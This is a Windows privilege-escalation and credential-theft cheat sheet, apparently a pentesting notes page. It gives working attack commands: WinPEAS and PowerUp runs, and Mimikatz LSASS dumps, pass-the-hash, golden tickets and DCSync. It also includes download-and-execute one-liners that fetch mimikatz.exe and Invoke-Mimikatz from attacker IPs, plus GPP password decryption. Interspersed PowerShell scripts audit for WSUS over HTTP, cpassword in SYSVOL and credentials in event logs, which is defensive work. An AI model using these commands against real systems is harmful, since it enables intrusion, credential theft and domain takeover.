# Windows

## <mark style="color:red;">Automated enumeration</mark>

### WinPEAS

<https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS>

Latest version and binaries: <https://github.com/peass-ng/PEASS-ng/releases>

{% code overflow="wrap" %}

```powershell
iwr https://github.com/peass-ng/PEASS-ng/releases/download/20241007-05f777b2/winPEASx64.exe -outputfile winpeas64.exe
```

{% endcode %}

Other ways to transfer files: [Misc](/pentesting-en-infraestructuras/misc.md#windows)

Basic execution:

```powershell
.\winPEASx64.exe
```

For more restricted environments, a loader can be used that loads and runs the program in memory. For example:

[#silentloader](#silentloader "mention")

```powershell
.\sloader.exe -f C:\Pentest\Tools\winPEASx64.exe -p notcolor log
```

### PowerUp

<https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1>

```powershell
. C:\AD\Tools\PowerUp.ps1
```

{% code overflow="wrap" %}

```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
```

{% endcode %}

Enumerate the possible privilege-escalation paths and export the information to an HTML file:

```powershell
Invoke-AllChecks -HTMLReport
```

### PrivescCheck

<https://github.com/itm4n/PrivescCheck>

```bash
git clone "https://github.com/itm4n/PrivescCheck.git"
```

{% code overflow="wrap" %}

```powershell
Invoke-PrivescCheck -Extended -Audit -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML,CSV,XML
```

{% endcode %}

## <mark style="color:red;">Vulnerabilities</mark>

### Updates via WSUS

WSUS (Windows Server Update Services) is a service for managing the distribution of updates across corporate networks of Windows systems.

It is a centralized server that downloads security patches and updates and distributes them to the clients on the local network.

For the WSUS setup to be vulnerable to <mark style="color:red;">**CVE-2020-1013**</mark>, two conditions must hold:

1. The WSUS server must <mark style="color:red;">**use the HTTP protocol**</mark> instead of HTTPS. To check which WSUS server is in use:

```powershell
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
```

```
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
      WUServer    REG_SZ    http://xtormin.local:8530
```

2. Use of the WSUS server must be enabled. For that, the result of the following <mark style="color:red;">**registry query must be equal to 0**</mark>:

```powershell
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
```
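The two registry checks above, combined into one audit function. This is an added example for defenders reviewing client update policy, not code from the original page: it reads the same `WUServer` and `UseWUServer` values, parses the server URL so a plain-HTTP scheme is detected reliably, and returns an object that can be collected from many hosts. The `PolicyRoot` parameter is a hypothetical addition so the check can be pointed at a loaded offline hive; the function follows Microsoft's documented meaning of the `UseWUServer` policy value, where 1 means the client uses the configured WSUS server.

```powershell
# Added audit example (not from the original page): reads the WSUS policy keys
# shown above and reports whether the CVE-2020-1013 preconditions hold on this host.
# Assumes it runs on a Windows client where the WindowsUpdate policy keys are readable.
function Test-WsusHttpExposure {
    [CmdletBinding()]
    param(
        # Hypothetical parameter: lets the check target a loaded offline hive instead of HKLM
        [string]$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
    )

    $wuServer    = (Get-ItemProperty -Path $PolicyRoot -Name WUServer -ErrorAction SilentlyContinue).WUServer
    $useWuServer = (Get-ItemProperty -Path "$PolicyRoot\AU" -Name UseWUServer -ErrorAction SilentlyContinue).UseWUServer

    $result = [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        WUServer     = $wuServer
        UseWUServer  = $useWuServer
        UsesHttp     = $false
        WsusEnabled  = $false
        Exposed      = $false
        Finding      = 'No WSUS policy configured (client uses Windows Update directly)'
    }

    if (-not $wuServer) { return $result }

    # Parse the value as a URL so a scheme typo or a bare host:port does not slip through
    try {
        $uri = [System.Uri]$wuServer
        $result.UsesHttp = ($uri.Scheme -eq 'http')
    } catch {
        $result.Finding = "WUServer value is not a valid URL: $wuServer"
        return $result
    }

    # Microsoft policy documentation: UseWUServer = 1 means the client uses the configured WSUS server
    $result.WsusEnabled = ($useWuServer -eq 1)
    $result.Exposed     = $result.UsesHttp -and $result.WsusEnabled

    $result.Finding = if ($result.Exposed) {
        "Client pulls updates over plaintext HTTP from $($uri.Host):$($uri.Port); publish WSUS over HTTPS and update WUServer"
    } elseif ($result.UsesHttp) {
        'WUServer is HTTP but the client is not currently using WSUS; fix the URL before enabling the policy'
    } else {
        'WSUS is configured over HTTPS'
    }
    return $result
}

# Run locally; pipe through Export-Csv when collecting from several hosts
Test-WsusHttpExposure | Format-List
```

The `UsesHttp` and `WsusEnabled` fields are returned separately so an HTTP URL is still reported as a misconfiguration even on hosts where the policy is not yet active.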

**Research writeup and BlackHat presentation:**

* Presentation: <https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf>
* Whitepaper: <https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update-wp.pdf>

<mark style="color:blue;">**Other references:**</mark>

* <https://gosecure.ai/blog/2020/09/08/wsus-attacks-part-2-cve-2020-1013-a-windows-10-local-privilege-escalation-1-day/>
* <https://learn.microsoft.com/es-es/windows-server/administration/windows-server-update-services/get-started/windows-server-update-services-wsus>
* <https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus:~:text=ft%20Name%2CRoot-,WSUS,-You%20can%20compromise>

## <mark style="color:red;">Privilege escalation</mark>

### Machine connected to Azure

{% code overflow="wrap" %}

```bash
wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
```

{% endcode %}

Other ways to transfer files: [Misc](/pentesting-en-infraestructuras/misc.md#windows)

```powershell
Azure-ADConnect -server 127.0.0.1 -db ADSync
```

### Modifiable service

**Identification**

<table><thead><tr><th width="148">Tool</th><th>Command</th></tr></thead><tbody><tr><td>PowerUp</td><td><pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">Get-ModifiableService
</code></pre></td></tr></tbody></table>

**Exploitation example**

<table><thead><tr><th width="148">Tool</th><th>Command</th></tr></thead><tbody><tr><td>PowerUp</td><td><pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell">Invoke-ServiceAbuse -Name 'WebServer' -UserName 'xtormincorp\xtormin' -Verbose
</code></pre></td></tr></tbody></table>

### Domain machines with privileged access

Search for machines where the user has local administrator permissions:

```powershell
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
```

* winrs:

```powershell
winrs -r:<Nombre de la máquina> cmd
set username
set computername
```

* PSSession:

{% code overflow="wrap" %}

```powershell
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
$env:username
```

{% endcode %}

## <mark style="color:red;">Credential extraction</mark>

### Obtaining SAM, SYSTEM, SECURITY

```powershell
reg save HKLM\SAM C:\WINDOWS\Temp\sam.dmp
reg save HKLM\SYSTEM C:\WINDOWS\Temp\system.dmp
reg save HKLM\security C:\WINDOWS\Temp\security.dmp
```

```bash
samdump2 system sam
```

{% code overflow="wrap" %}

```bash
/home/kali/tools/impacket/examples/secretsdump.py -sam sam.dmp -system system.dmp -security security.dmp LOCAL
```

{% endcode %}

### GPP - Group Policy Preferences

{% code overflow="wrap" %}

```bash
cd %windir%\system32\grouppolicy
```

{% endcode %}

{% code overflow="wrap" %}

```xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="jdBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
gpp-decrypt jdBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
```

{% endcode %}
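A detection-side counterpart to the `Groups.xml` sample above, added here as an example that is not part of the original page: it walks a SYSVOL policies tree and reports every Group Policy Preferences XML file that still carries a `cpassword` attribute, without decrypting anything. The finding a defender needs is "this GPO embeds a credential; remove it and rotate the account". The default `Path` assumes the domain's SYSVOL share is reachable at the usual UNC location; point it elsewhere for an offline copy.

```powershell
# Added detection example (not from the original page): lists GPP preference files that
# still contain a cpassword attribute. Assumes read access to the SYSVOL policies tree.
function Find-GppCpassword {
    [CmdletBinding()]
    param(
        # Assumption: SYSVOL is reachable via the domain DNS name; override for a copied tree
        [string]$Path = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies"
    )

    # Preference file types documented as able to carry cpassword
    $names = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Printers.xml', 'Drives.xml'

    Get-ChildItem -Path $Path -Recurse -Include $names -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            try { [xml]$doc = Get-Content -Path $file.FullName -Raw -ErrorAction Stop }
            catch { return }   # unreadable or malformed XML: skip it and keep scanning

            # Any element with a non-empty cpassword attribute, regardless of nesting depth
            foreach ($node in $doc.SelectNodes('//*[@cpassword!=""]')) {
                # Account attribute name differs per preference type (userName, accountName, runAs)
                $account = foreach ($attr in 'userName', 'accountName', 'runAs') {
                    if ($node.HasAttribute($attr)) { $node.GetAttribute($attr); break }
                }
                [pscustomobject]@{
                    File      = $file.FullName
                    Element   = $node.LocalName
                    Account   = if ($account) { $account } else { $node.GetAttribute('name') }
                    Changed   = $node.GetAttribute('changed')
                    # Only the ciphertext length is reported so the scan output never stores the value itself
                    CipherLen = $node.GetAttribute('cpassword').Length
                }
            }
        }
}

# Example run; the output is the remediation list (delete the preference item, rotate the account)
Find-GppCpassword | Sort-Object File | Format-Table -AutoSize
```

`GetAttribute` is used instead of PowerShell's dotted XML properties so that an attribute called `name` is never confused with the `Name` property of the element itself.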

### Mimikatz

{% code overflow="wrap" %}

```powershell
certutil -urlcache -split -f http://192.168.119.142/mimikatz.exe C:\Windows\Temp\mimikatz.exe && C:\Windows\Temp\mimikatz.exe

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://10.0.0.5/Invoke-Mimikatz.ps1') ; Invoke-Mimikatz -DumpCreds
```

{% endcode %}

```powershell
privilege::debug
log
log customlogfilename.log

token::elevate
```

#### Dump LSASS

```powershell
privilege::debug
token::elevate
sekurlsa::logonpasswords
```

#### Sekurlsa

{% code overflow="wrap" %}

```powershell
sekurlsa::ekeys

sekurlsa::logonpasswords
sekurlsa::logonPasswords full

sekurlsa::tickets
sekurlsa::tickets /export

sekurlsa::tspkg

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:4c13687d23a3a88e57fc9ef8bb4cdf2f /run:cmd

sekurlsa::minidump c:\Windows\Temp\lsass.dmp
```

{% endcode %}

#### Kerberos

{% code overflow="wrap" %}

```powershell
kerberos::list /export

kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```

{% endcode %}

#### DCSync

```powershell
lsadump::dcsync /user:domain\krbtgt /domain:xor.com
lsadump::dcsync /domain:xor.com /all /csv
lsadump::dcsync /domain:xor.com /user:administrator

lsadump::lsa /inject
```

```powershell
token::elevate
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
```

#### Vault

```powershell
vault::cred
vault::cred /patch
vault::list
```

#### Terminal Services

```powershell
ts::multirdp
ts::logonpasswords
```

#### Pass-the-Hash

{% code overflow="wrap" %}

```powershell
sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:cc36cf7a8514893efccd332446158b1a

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:cc36cf7a8514893efccd332446158b1a /aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c94098a9e9

sekurlsa::pth /user:Administrator /domain:xtormincorp.local /ntlm:{NTLM_hash} /run:cmd.exe
```

{% endcode %}

### Credentials in event logs

Windows Event ID 4688 logs (process creation with command-line auditing) are parsed to extract credentials:

```bash
nxc smb 192.168.1.100 -u $USER -p $PASS -M eventlog_creds
```
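The same idea from the host owner's side, as an added example that is not from the original page or the nxc module: it reads Security log 4688 events through `Get-WinEvent`, looks for argument shapes that commonly carry a password (`/p:`, `/password:`, `/rp:`, `-p`, `--password`, `password=`) and returns the process, user and flag with the secret itself masked, so the audit report does not become a second copy of the leak. The `CommandLine` parameter is a hypothetical addition that feeds constructed command lines instead of the live log, which is how the sample at the bottom runs offline.

```powershell
# Added detection example (not from the original page): flags credential-looking arguments in
# 4688 process-creation events. Command lines are only present when "Include command line in
# process creation events" is enabled, and reading the Security log needs administrator rights.
function Find-CredentialInProcessCommandLine {
    [CmdletBinding()]
    param(
        [int]$MaxEvents = 5000,
        # Hypothetical parameter: analyse constructed command lines instead of the live Security log
        [string[]]$CommandLine
    )

    # Argument shapes that commonly carry a secret; the <secret> group is masked before output
    $patterns = @(
        '(?i)(?<flag>/(?:p|pass|password|rp):)(?<secret>\S+)',                 # /p:, /password:, schtasks /rp:
        '(?i)(?<flag>(?:^|\s)-{1,2}(?:p|pass|password)\s+)(?<secret>\S+)',      # -p ..., -P ..., --password ...
        '(?i)(?<flag>\bpassword=)(?<secret>[^\s;&"]+)'                          # password=... in connection strings
    )

    $lines = if ($PSBoundParameters.ContainsKey('CommandLine')) {
        $CommandLine | ForEach-Object {
            [pscustomobject]@{ Time = Get-Date; Process = '(constructed)'; User = '(constructed)'; CommandLine = $_ }
        }
    } else {
        Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688 } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
            ForEach-Object {
                # Pull the named EventData fields from the event XML rather than relying on property order
                $x = [xml]$_.ToXml()
                $d = @{}
                foreach ($n in $x.Event.EventData.Data) { $d[$n.GetAttribute('Name')] = $n.InnerText }
                [pscustomobject]@{ Time = $_.TimeCreated; Process = $d['NewProcessName']; User = $d['SubjectUserName']; CommandLine = $d['CommandLine'] }
            }
    }

    foreach ($l in $lines) {
        if (-not $l.CommandLine) { continue }
        foreach ($p in $patterns) {
            $m = [regex]::Match($l.CommandLine, $p)
            if ($m.Success) {
                $secret = $m.Groups['secret'].Value
                [pscustomobject]@{
                    Time       = $l.Time
                    Process    = $l.Process
                    User       = $l.User
                    Flag       = $m.Groups['flag'].Value.Trim()
                    # Secret replaced by asterisks of the same length; the value never leaves the function
                    MaskedLine = $l.CommandLine.Replace($secret, ('*' * $secret.Length))
                }
                break
            }
        }
    }
}

# Constructed sample command lines (not real events) to show the output shape offline
$sample = @(
    'net use Z: \\fileserver\share /user:corp\svc_backup /p:Hunter2!',
    'sqlcmd -S db01 -U sa -P S3cr3t -Q "select 1"',
    'schtasks /create /tn Sync /tr sync.exe /ru corp\svc_sync /rp Winter2024',
    'notepad.exe C:\notes.txt'
)
Find-CredentialInProcessCommandLine -CommandLine $sample | Format-Table -AutoSize
```

Run without `-CommandLine` on a host with command-line auditing enabled to scan the live log; each hit is a credential to rotate and a script or scheduled task to fix so the secret is no longer passed as an argument.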

## <mark style="color:red;">References</mark>

* WADComs - <https://wadcoms.github.io/#+Privilege%20Escalation>
* Track 3 15 Goodbye Obfuscation Hello Invisi Shell Hiding Your Powershell Script in Plain Sight Omer - <https://www.youtube.com/watch?v=Y3oMEiySxcc>
* <https://www.atomicredteam.io/atomic-red-team>
* <https://etchedshell.medium.com/powerup-experience-42f3d7904e79>
